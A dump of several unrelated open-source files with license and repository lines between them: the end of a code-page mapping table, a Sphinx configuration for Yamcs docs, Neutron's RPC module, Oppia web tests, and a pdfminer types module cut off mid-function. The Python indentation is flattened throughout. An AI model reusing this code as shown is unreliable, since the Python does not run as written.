0x0073: 0x0073, # LATIN SMALL LETTER S
0x0074: 0x0074, # LATIN SMALL LETTER T
0x0075: 0x0075, # LATIN SMALL LETTER U
0x0076: 0x0076, # LATIN SMALL LETTER V
0x0077: 0x0077, # LATIN SMALL LETTER W
0x0078: 0x0078, # LATIN SMALL LETTER X
0x0079: 0x0079, # LATIN SMALL LETTER Y
0x007a: 0x007a, # LATIN SMALL LETTER Z
0x007b: 0x007b, # LEFT CURLY BRACKET
0x007c: 0x007c, # VERTICAL LINE
0x007d: 0x007d, # RIGHT CURLY BRACKET
0x007e: 0x007e, # TILDE
0x007f: 0x007f, # DELETE
0x00a0: 0x00ff, # NO-BREAK SPACE
0x00a2: 0x009b, # CENT SIGN
0x00a3: 0x009c, # POUND SIGN
0x00a4: 0x0098, # CURRENCY SIGN
0x00a6: 0x00a0, # BROKEN BAR
0x00a7: 0x008f, # SECTION SIGN
0x00a8: 0x00a4, # DIAERESIS
0x00ab: 0x00ae, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00ac: 0x00aa, # NOT SIGN
0x00af: 0x00a7, # MACRON
0x00b0: 0x00f8, # DEGREE SIGN
0x00b1: 0x00f1, # PLUS-MINUS SIGN
0x00b2: 0x00fd, # SUPERSCRIPT TWO
0x00b3: 0x00a6, # SUPERSCRIPT THREE
0x00b4: 0x00a1, # ACUTE ACCENT
0x00b5: 0x00e6, # MICRO SIGN
0x00b6: 0x0086, # PILCROW SIGN
0x00b7: 0x00fa, # MIDDLE DOT
0x00b8: 0x00a5, # CEDILLA
0x00bb: 0x00af, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00bc: 0x00ac, # VULGAR FRACTION ONE QUARTER
0x00bd: 0x00ab, # VULGAR FRACTION ONE HALF
0x00be: 0x00ad, # VULGAR FRACTION THREE QUARTERS
0x00c0: 0x008e, # LATIN CAPITAL LETTER A WITH GRAVE
0x00c2: 0x0084, # LATIN CAPITAL LETTER A WITH CIRCUMFLEX
0x00c7: 0x0080, # LATIN CAPITAL LETTER C WITH CEDILLA
0x00c8: 0x0091, # LATIN CAPITAL LETTER E WITH GRAVE
0x00c9: 0x0090, # LATIN CAPITAL LETTER E WITH ACUTE
0x00ca: 0x0092, # LATIN CAPITAL LETTER E WITH CIRCUMFLEX
0x00cb: 0x0094, # LATIN CAPITAL LETTER E WITH DIAERESIS
0x00ce: 0x00a8, # LATIN CAPITAL LETTER I WITH CIRCUMFLEX
0x00cf: 0x0095, # LATIN CAPITAL LETTER I WITH DIAERESIS
0x00d4: 0x0099, # LATIN CAPITAL LETTER O WITH CIRCUMFLEX
0x00d9: 0x009d, # LATIN CAPITAL LETTER U WITH GRAVE
0x00db: 0x009e, # LATIN CAPITAL LETTER U WITH CIRCUMFLEX
0x00dc: 0x009a, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x00df: 0x00e1, # LATIN SMALL LETTER SHARP S
0x00e0: 0x0085, # LATIN SMALL LETTER A WITH GRAVE
0x00e2: 0x0083, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x00e7: 0x0087, # LATIN SMALL LETTER C WITH CEDILLA
0x00e8: 0x008a, # LATIN SMALL LETTER E WITH GRAVE
0x00e9: 0x0082, # LATIN SMALL LETTER E WITH ACUTE
0x00ea: 0x0088, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x00eb: 0x0089, # LATIN SMALL LETTER E WITH DIAERESIS
0x00ee: 0x008c, # LATIN SMALL LETTER I WITH CIRCUMFLEX
0x00ef: 0x008b, # LATIN SMALL LETTER I WITH DIAERESIS
0x00f3: 0x00a2, # LATIN SMALL LETTER O WITH ACUTE
0x00f4: 0x0093, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x00f7: 0x00f6, # DIVISION SIGN
0x00f9: 0x0097, # LATIN SMALL LETTER U WITH GRAVE
0x00fa: 0x00a3, # LATIN SMALL LETTER U WITH ACUTE
0x00fb: 0x0096, # LATIN SMALL LETTER U WITH CIRCUMFLEX
0x00fc: 0x0081, # LATIN SMALL LETTER U WITH DIAERESIS
0x0192: 0x009f, # LATIN SMALL LETTER F WITH HOOK
0x0393: 0x00e2, # GREEK CAPITAL LETTER GAMMA
0x0398: 0x00e9, # GREEK CAPITAL LETTER THETA
0x03a3: 0x00e4, # GREEK CAPITAL LETTER SIGMA
0x03a6: 0x00e8, # GREEK CAPITAL LETTER PHI
0x03a9: 0x00ea, # GREEK CAPITAL LETTER OMEGA
0x03b1: 0x00e0, # GREEK SMALL LETTER ALPHA
0x03b4: 0x00eb, # GREEK SMALL LETTER DELTA
0x03b5: 0x00ee, # GREEK SMALL LETTER EPSILON
0x03c0: 0x00e3, # GREEK SMALL LETTER PI
0x03c3: 0x00e5, # GREEK SMALL LETTER SIGMA
0x03c4: 0x00e7, # GREEK SMALL LETTER TAU
0x03c6: 0x00ed, # GREEK SMALL LETTER PHI
0x2017: 0x008d, # DOUBLE LOW LINE
0x207f: 0x00fc, # SUPERSCRIPT LATIN SMALL LETTER N
0x2219: 0x00f9, # BULLET OPERATOR
0x221a: 0x00fb, # SQUARE ROOT
0x221e: 0x00ec, # INFINITY
0x2229: 0x00ef, # INTERSECTION
0x2248: 0x00f7, # ALMOST EQUAL TO
0x2261: 0x00f0, # IDENTICAL TO
0x2264: 0x00f3, # LESS-THAN OR EQUAL TO
0x2265: 0x00f2, # GREATER-THAN OR EQUAL TO
0x2310: 0x00a9, # REVERSED NOT SIGN
0x2320: 0x00f4, # TOP HALF INTEGRAL
0x2321: 0x00f5, # BOTTOM HALF INTEGRAL
0x2500: 0x00c4, # BOX DRAWINGS LIGHT HORIZONTAL
0x2502: 0x00b3, # BOX DRAWINGS LIGHT VERTICAL
0x250c: 0x00da, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x2510: 0x00bf, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x2514: 0x00c0, # BOX DRAWINGS LIGHT UP AND RIGHT
0x2518: 0x00d9, # BOX DRAWINGS LIGHT UP AND LEFT
0x251c: 0x00c3, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x2524: 0x00b4, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x252c: 0x00c2, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x2534: 0x00c1, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x253c: 0x00c5, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x2550: 0x00cd, # BOX DRAWINGS DOUBLE HORIZONTAL
0x2551: 0x00ba, # BOX DRAWINGS DOUBLE VERTICAL
0x2552: 0x00d5, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x2553: 0x00d6, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x2554: 0x00c9, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x2555: 0x00b8, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x2556: 0x00b7, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x2557: 0x00bb, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x2558: 0x00d4, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x2559: 0x00d3, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x255a: 0x00c8, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x255b: 0x00be, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x255c: 0x00bd, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x255d: 0x00bc, # BOX DRAWINGS DOUBLE UP AND LEFT
0x255e: 0x00c6, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x255f: 0x00c7, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x2560: 0x00cc, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x2561: 0x00b5, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x2562: 0x00b6, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x2563: 0x00b9, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x2564: 0x00d1, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x2565: 0x00d2, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x2566: 0x00cb, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x2567: 0x00cf, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x2568: 0x00d0, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x2569: 0x00ca, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x256a: 0x00d8, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x256b: 0x00d7, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x256c: 0x00ce, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x2580: 0x00df, # UPPER HALF BLOCK
0x2584: 0x00dc, # LOWER HALF BLOCK
0x2588: 0x00db, # FULL BLOCK
0x258c: 0x00dd, # LEFT HALF BLOCK
0x2590: 0x00de, # RIGHT HALF BLOCK
0x2591: 0x00b0, # LIGHT SHADE
0x2592: 0x00b1, # MEDIUM SHADE
0x2593: 0x00b2, # DARK SHADE
0x25a0: 0x00fe, # BLACK SQUARE
}
| apache-2.0 |
yamcs/yamcs | docs/http-api/conf.py | 3 | 3605 | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
import os
import sys
from xml.etree import ElementTree as ET
import pkg_resources
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../_ext'))
# Read the latest Yamcs versions from the Maven pom.xml
tree = ET.ElementTree()
if os.path.exists('../../pom.xml'):
tree.parse('../../pom.xml') # conf.py is used from its normal location
elif os.path.exists('../../../pom.xml'):
tree.parse('../../../pom.xml') # conf.py is used from within _auto/
yamcs_version_el = tree.getroot().find('{http://maven.apache.org/POM/4.0.0}version')
project = u'Yamcs'
copyright = u'2019, Space Applications Services'
author = u'Yamcs Team'
# The short X.Y version
version = yamcs_version_el.text
# The full version, including alpha/beta/rc tags
release = version
extensions = [
'sphinx.ext.extlinks',
'sphinxcontrib.fulltoc',
'proto',
]
# Add any paths that contain templates here, relative to this directory.
#templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = [u'_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
extlinks = {
'source': ('https://github.com/yamcs/yamcs/blob/master/%s', ''),
}
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'nature'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
'sidebarwidth': '300px',
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
html_show_sourcelink = False
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
'papersize': 'a4paper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
'preamble': '\setcounter{tocdepth}{2}',
# Latex figure (float) alignment
#
'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'yamcs-http-api.tex', 'Yamcs HTTP API', 'Space Applications Services', 'manual'),
]
latex_show_pagerefs = True
latex_show_urls = 'footnote'
| agpl-3.0 |
uni2u/neutron | neutron/common/rpc.py | 2 | 8756 | # Copyright (c) 2012 OpenStack Foundation.
# Copyright (c) 2014 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.config import cfg
from oslo import messaging
from oslo.messaging import serializer as om_serializer
from neutron.common import exceptions
from neutron.common import log
from neutron import context
from neutron.openstack.common import log as logging
from neutron.openstack.common import service
LOG = logging.getLogger(__name__)
TRANSPORT = None
NOTIFIER = None
ALLOWED_EXMODS = [
exceptions.__name__,
]
EXTRA_EXMODS = []
TRANSPORT_ALIASES = {
'neutron.openstack.common.rpc.impl_fake': 'fake',
'neutron.openstack.common.rpc.impl_qpid': 'qpid',
'neutron.openstack.common.rpc.impl_kombu': 'rabbit',
'neutron.openstack.common.rpc.impl_zmq': 'zmq',
'neutron.rpc.impl_fake': 'fake',
'neutron.rpc.impl_qpid': 'qpid',
'neutron.rpc.impl_kombu': 'rabbit',
'neutron.rpc.impl_zmq': 'zmq',
}
def init(conf):
global TRANSPORT, NOTIFIER
exmods = get_allowed_exmods()
TRANSPORT = messaging.get_transport(conf,
allowed_remote_exmods=exmods,
aliases=TRANSPORT_ALIASES)
serializer = RequestContextSerializer()
NOTIFIER = messaging.Notifier(TRANSPORT, serializer=serializer)
def cleanup():
global TRANSPORT, NOTIFIER
assert TRANSPORT is not None
assert NOTIFIER is not None
TRANSPORT.cleanup()
TRANSPORT = NOTIFIER = None
def add_extra_exmods(*args):
EXTRA_EXMODS.extend(args)
def clear_extra_exmods():
del EXTRA_EXMODS[:]
def get_allowed_exmods():
return ALLOWED_EXMODS + EXTRA_EXMODS
def get_client(target, version_cap=None, serializer=None):
assert TRANSPORT is not None
serializer = RequestContextSerializer(serializer)
return messaging.RPCClient(TRANSPORT,
target,
version_cap=version_cap,
serializer=serializer)
def get_server(target, endpoints, serializer=None):
assert TRANSPORT is not None
serializer = RequestContextSerializer(serializer)
return messaging.get_rpc_server(TRANSPORT, target, endpoints,
'eventlet', serializer)
def get_notifier(service=None, host=None, publisher_id=None):
assert NOTIFIER is not None
if not publisher_id:
publisher_id = "%s.%s" % (service, host or cfg.CONF.host)
return NOTIFIER.prepare(publisher_id=publisher_id)
class RequestContextSerializer(om_serializer.Serializer):
"""This serializer is used to convert RPC common context into
Neutron Context.
"""
def __init__(self, base=None):
super(RequestContextSerializer, self).__init__()
self._base = base
def serialize_entity(self, ctxt, entity):
if not self._base:
return entity
return self._base.serialize_entity(ctxt, entity)
def deserialize_entity(self, ctxt, entity):
if not self._base:
return entity
return self._base.deserialize_entity(ctxt, entity)
def serialize_context(self, ctxt):
return ctxt.to_dict()
def deserialize_context(self, ctxt):
rpc_ctxt_dict = ctxt.copy()
user_id = rpc_ctxt_dict.pop('user_id', None)
if not user_id:
user_id = rpc_ctxt_dict.pop('user', None)
tenant_id = rpc_ctxt_dict.pop('tenant_id', None)
if not tenant_id:
tenant_id = rpc_ctxt_dict.pop('project_id', None)
return context.Context(user_id, tenant_id,
load_admin_roles=False, **rpc_ctxt_dict)
class RpcProxy(object):
'''
This class is created to facilitate migration from oslo-incubator
RPC layer implementation to oslo.messaging and is intended to
emulate RpcProxy class behaviour using oslo.messaging API once the
migration is applied.
'''
RPC_API_NAMESPACE = None
def __init__(self, topic, default_version, version_cap=None):
super(RpcProxy, self).__init__()
self.topic = topic
target = messaging.Target(topic=topic, version=default_version)
self._client = get_client(target, version_cap=version_cap)
def make_msg(self, method, **kwargs):
return {'method': method,
'namespace': self.RPC_API_NAMESPACE,
'args': kwargs}
@log.log
def call(self, context, msg, **kwargs):
return self.__call_rpc_method(
context, msg, rpc_method='call', **kwargs)
@log.log
def cast(self, context, msg, **kwargs):
self.__call_rpc_method(context, msg, rpc_method='cast', **kwargs)
@log.log
def fanout_cast(self, context, msg, **kwargs):
kwargs['fanout'] = True
self.__call_rpc_method(context, msg, rpc_method='cast', **kwargs)
def __call_rpc_method(self, context, msg, **kwargs):
options = dict(
((opt, kwargs[opt])
for opt in ('fanout', 'timeout', 'topic', 'version')
if kwargs.get(opt))
)
if msg['namespace']:
options['namespace'] = msg['namespace']
if options:
callee = self._client.prepare(**options)
else:
callee = self._client
func = getattr(callee, kwargs['rpc_method'])
return func(context, msg['method'], **msg['args'])
class RpcCallback(object):
'''
This class is created to facilitate migration from oslo-incubator
RPC layer implementation to oslo.messaging and is intended to set
callback version using oslo.messaging API once the migration is
applied.
'''
RPC_API_VERSION = '1.0'
def __init__(self):
super(RpcCallback, self).__init__()
self.target = messaging.Target(version=self.RPC_API_VERSION)
class Service(service.Service):
"""Service object for binaries running on hosts.
A service enables rpc by listening to queues based on topic and host.
"""
def __init__(self, host, topic, manager=None, serializer=None):
super(Service, self).__init__()
self.host = host
self.topic = topic
self.serializer = serializer
if manager is None:
self.manager = self
else:
self.manager = manager
def start(self):
super(Service, self).start()
self.conn = create_connection(new=True)
LOG.debug("Creating Consumer connection for Service %s" %
self.topic)
endpoints = [self.manager]
# Share this same connection for these Consumers
self.conn.create_consumer(self.topic, endpoints, fanout=False)
node_topic = '%s.%s' % (self.topic, self.host)
self.conn.create_consumer(node_topic, endpoints, fanout=False)
self.conn.create_consumer(self.topic, endpoints, fanout=True)
# Hook to allow the manager to do other initializations after
# the rpc connection is created.
if callable(getattr(self.manager, 'initialize_service_hook', None)):
self.manager.initialize_service_hook(self)
# Consume from all consumers in threads
self.conn.consume_in_threads()
def stop(self):
# Try to shut the connection down, but if we get any sort of
# errors, go ahead and ignore them.. as we're shutting down anyway
try:
self.conn.close()
except Exception:
pass
super(Service, self).stop()
class Connection(object):
def __init__(self):
super(Connection, self).__init__()
self.servers = []
def create_consumer(self, topic, endpoints, fanout=False):
target = messaging.Target(
topic=topic, server=cfg.CONF.host, fanout=fanout)
server = get_server(target, endpoints)
self.servers.append(server)
def consume_in_threads(self):
for server in self.servers:
server.start()
return self.servers
# functions
def create_connection(new=True):
return Connection()
# exceptions
RPCException = messaging.MessagingException
RemoteError = messaging.RemoteError
MessagingTimeout = messaging.MessagingTimeout
| apache-2.0 |
DewarM/oppia | core/controllers/home_test.py | 2 | 10750 | # Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the user notification dashboard and 'my explorations' pages."""
from core.domain import feedback_services
from core.domain import rights_manager
from core.domain import user_jobs_continuous
from core.tests import test_utils
import feconf
class HomePageTest(test_utils.GenericTestBase):
def test_logged_out_homepage(self):
"""Test the logged-out version of the home page."""
response = self.testapp.get('/')
self.assertEqual(response.status_int, 200)
response.mustcontain(
'Your personal tutor',
'Oppia - Gallery', 'About', 'Login', no=['Logout'])
def test_notifications_dashboard_redirects_for_logged_out_users(self):
"""Test the logged-out view of the notifications dashboard."""
response = self.testapp.get('/notifications_dashboard')
self.assertEqual(response.status_int, 302)
# This should redirect to the login page.
self.assertIn('signup', response.headers['location'])
self.assertIn('notifications_dashboard', response.headers['location'])
self.login('reader@example.com')
response = self.testapp.get('/notifications_dashboard')
# This should redirect the user to complete signup.
self.assertEqual(response.status_int, 302)
self.logout()
def test_logged_in_notifications_dashboard(self):
"""Test the logged-in view of the notifications dashboard."""
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.login(self.EDITOR_EMAIL)
response = self.testapp.get('/notifications_dashboard')
self.assertEqual(response.status_int, 200)
response.mustcontain(
'Notifications', 'Logout',
self.get_expected_logout_url('/'),
no=['Login', 'Your personal tutor',
self.get_expected_login_url('/')])
self.logout()
class MyExplorationsHandlerTest(test_utils.GenericTestBase):
MY_EXPLORATIONS_DATA_URL = '/myexplorationshandler/data'
COLLABORATOR_EMAIL = 'collaborator@example.com'
COLLABORATOR_USERNAME = 'collaborator'
EXP_ID = 'exp_id'
EXP_TITLE = 'Exploration title'
def setUp(self):
super(MyExplorationsHandlerTest, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.COLLABORATOR_EMAIL, self.COLLABORATOR_USERNAME)
self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.collaborator_id = self.get_user_id_from_email(
self.COLLABORATOR_EMAIL)
self.viewer_id = self.get_user_id_from_email(self.VIEWER_EMAIL)
def test_no_explorations(self):
self.login(self.OWNER_EMAIL)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(response['explorations_list'], [])
self.logout()
def test_managers_can_see_explorations(self):
self.save_new_default_exploration(
self.EXP_ID, self.owner_id, title=self.EXP_TITLE)
self.set_admins([self.OWNER_EMAIL])
self.login(self.OWNER_EMAIL)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['status'],
rights_manager.ACTIVITY_STATUS_PRIVATE)
rights_manager.publish_exploration(self.owner_id, self.EXP_ID)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['status'],
rights_manager.ACTIVITY_STATUS_PUBLIC)
rights_manager.publicize_exploration(self.owner_id, self.EXP_ID)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['status'],
rights_manager.ACTIVITY_STATUS_PUBLICIZED)
self.logout()
def test_collaborators_can_see_explorations(self):
self.save_new_default_exploration(
self.EXP_ID, self.owner_id, title=self.EXP_TITLE)
rights_manager.assign_role_for_exploration(
self.owner_id, self.EXP_ID, self.collaborator_id,
rights_manager.ROLE_EDITOR)
self.set_admins([self.OWNER_EMAIL])
self.login(self.COLLABORATOR_EMAIL)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['status'],
rights_manager.ACTIVITY_STATUS_PRIVATE)
rights_manager.publish_exploration(self.owner_id, self.EXP_ID)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['status'],
rights_manager.ACTIVITY_STATUS_PUBLIC)
rights_manager.publicize_exploration(self.owner_id, self.EXP_ID)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['status'],
rights_manager.ACTIVITY_STATUS_PUBLICIZED)
self.logout()
def test_viewer_cannot_see_explorations(self):
self.save_new_default_exploration(
self.EXP_ID, self.owner_id, title=self.EXP_TITLE)
rights_manager.assign_role_for_exploration(
self.owner_id, self.EXP_ID, self.viewer_id,
rights_manager.ROLE_VIEWER)
self.set_admins([self.OWNER_EMAIL])
self.login(self.VIEWER_EMAIL)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(response['explorations_list'], [])
rights_manager.publish_exploration(self.owner_id, self.EXP_ID)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(response['explorations_list'], [])
rights_manager.publicize_exploration(self.owner_id, self.EXP_ID)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(response['explorations_list'], [])
self.logout()
def test_can_see_feedback_thread_counts(self):
self.save_new_default_exploration(
self.EXP_ID, self.owner_id, title=self.EXP_TITLE)
self.login(self.OWNER_EMAIL)
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['num_open_threads'], 0)
self.assertEqual(
response['explorations_list'][0]['num_total_threads'], 0)
def mock_get_thread_analytics(unused_exploration_id):
return {
'num_open_threads': 2,
'num_total_threads': 3,
}
with self.swap(
feedback_services, 'get_thread_analytics',
mock_get_thread_analytics):
response = self.get_json(self.MY_EXPLORATIONS_DATA_URL)
self.assertEqual(len(response['explorations_list']), 1)
self.assertEqual(
response['explorations_list'][0]['num_open_threads'], 2)
self.assertEqual(
response['explorations_list'][0]['num_total_threads'], 3)
self.logout()
class NotificationsDashboardHandlerTest(test_utils.GenericTestBase):
DASHBOARD_DATA_URL = '/notificationsdashboardhandler/data'
def setUp(self):
super(NotificationsDashboardHandlerTest, self).setUp()
self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)
self.viewer_id = self.get_user_id_from_email(self.VIEWER_EMAIL)
def _get_recent_notifications_mock_by_viewer(self, unused_user_id):
"""Returns a single feedback thread by VIEWER_ID."""
return (100000, [{
'activity_id': 'exp_id',
'activity_title': 'exp_title',
'author_id': self.viewer_id,
'last_updated_ms': 100000,
'subject': 'Feedback Message Subject',
'type': feconf.UPDATE_TYPE_FEEDBACK_MESSAGE,
}])
def _get_recent_notifications_mock_by_anonymous_user(self, unused_user_id):
"""Returns a single feedback thread by an anonymous user."""
return (200000, [{
'activity_id': 'exp_id',
'activity_title': 'exp_title',
'author_id': None,
'last_updated_ms': 100000,
'subject': 'Feedback Message Subject',
'type': feconf.UPDATE_TYPE_FEEDBACK_MESSAGE,
}])
def test_author_ids_are_handled_correctly(self):
"""Test that author ids are converted into author usernames
and that anonymous authors are handled correctly.
"""
with self.swap(
user_jobs_continuous.DashboardRecentUpdatesAggregator,
'get_recent_notifications',
self._get_recent_notifications_mock_by_viewer):
self.login(self.VIEWER_EMAIL)
response = self.get_json(self.DASHBOARD_DATA_URL)
self.assertEqual(len(response['recent_notifications']), 1)
self.assertEqual(
response['recent_notifications'][0]['author_username'],
self.VIEWER_USERNAME)
self.assertNotIn('author_id', response['recent_notifications'][0])
with self.swap(
user_jobs_continuous.DashboardRecentUpdatesAggregator,
'get_recent_notifications',
self._get_recent_notifications_mock_by_anonymous_user):
self.login(self.VIEWER_EMAIL)
response = self.get_json(self.DASHBOARD_DATA_URL)
self.assertEqual(len(response['recent_notifications']), 1)
self.assertEqual(
response['recent_notifications'][0]['author_username'], '')
self.assertNotIn('author_id', response['recent_notifications'][0])
| apache-2.0 |
Cashiuus/metagoofil | pdfminer/pdftypes.py | 26 | 7735 | #!/usr/bin/env python2
import sys
import zlib
from lzw import lzwdecode
from ascii85 import ascii85decode, asciihexdecode
from runlength import rldecode
from psparser import PSException, PSObject
from psparser import LIT, KWD, STRICT
LITERAL_CRYPT = LIT('Crypt')
# Abbreviation of Filter names in PDF 4.8.6. "Inline Images"
LITERALS_FLATE_DECODE = (LIT('FlateDecode'), LIT('Fl'))
LITERALS_LZW_DECODE = (LIT('LZWDecode'), LIT('LZW'))
LITERALS_ASCII85_DECODE = (LIT('ASCII85Decode'), LIT('A85'))
LITERALS_ASCIIHEX_DECODE = (LIT('ASCIIHexDecode'), LIT('AHx'))
LITERALS_RUNLENGTH_DECODE = (LIT('RunLengthDecode'), LIT('RL'))
LITERALS_CCITTFAX_DECODE = (LIT('CCITTFaxDecode'), LIT('CCF'))
LITERALS_DCT_DECODE = (LIT('DCTDecode'), LIT('DCT'))
## PDF Objects
##
class PDFObject(PSObject): pass
class PDFException(PSException): pass
class PDFTypeError(PDFException): pass
class PDFValueError(PDFException): pass
class PDFNotImplementedError(PSException): pass
## PDFObjRef
##
class PDFObjRef(PDFObject):
def __init__(self, doc, objid, _):
if objid == 0:
if STRICT:
raise PDFValueError('PDF object id cannot be 0.')
self.doc = doc
self.objid = objid
#self.genno = genno # Never used.
return
def __repr__(self):
return '<PDFObjRef:%d>' % (self.objid)
def resolve(self):
return self.doc.getobj(self.objid)
# resolve
def resolve1(x):
"""Resolves an object.
If this is an array or dictionary, it may still contains
some indirect objects inside.
"""
while isinstance(x, PDFObjRef):
x = x.resolve()
return x
def resolve_all(x):
"""Recursively resolves the given object and all the internals.
Make sure there is no indirect reference within the nested object.
This procedure might be slow.
"""
while isinstance(x, PDFObjRef):
x = x.resolve()
if isinstance(x, list):
x = [ resolve_all(v) for v in x ]
elif isinstance(x, dict):
for (k,v) in x.iteritems():
x[k] = resolve_all(v)
return x
def decipher_all(decipher, objid, genno, x):
"""Recursively deciphers the given object.
"""
if isinstance(x, str):
return decipher(objid, genno, x)
if isinstance(x, list):
x = [ decipher_all(decipher, objid, genno, v) for v in x ]
elif isinstance(x, dict):
for (k,v) in x.iteritems():
x[k] = decipher_all(decipher, objid, genno, v)
return x
# Type cheking
def int_value(x):
x = resolve1(x)
if not isinstance(x, int):
if STRICT:
raise PDFTypeError('Integer required: %r' % x)
return 0
return x
def float_value(x):
x = resolve1(x)
if not isinstance(x, float):
if STRICT:
raise PDFTypeError('Float required: %r' % x)
return 0.0
return x
def num_value(x):
x = resolve1(x)
if not (isinstance(x, int) or isinstance(x, float)):
if STRICT:
raise PDFTypeError('Int or Float required: %r' % x)
return 0
return x
def str_value(x):
x = resolve1(x)
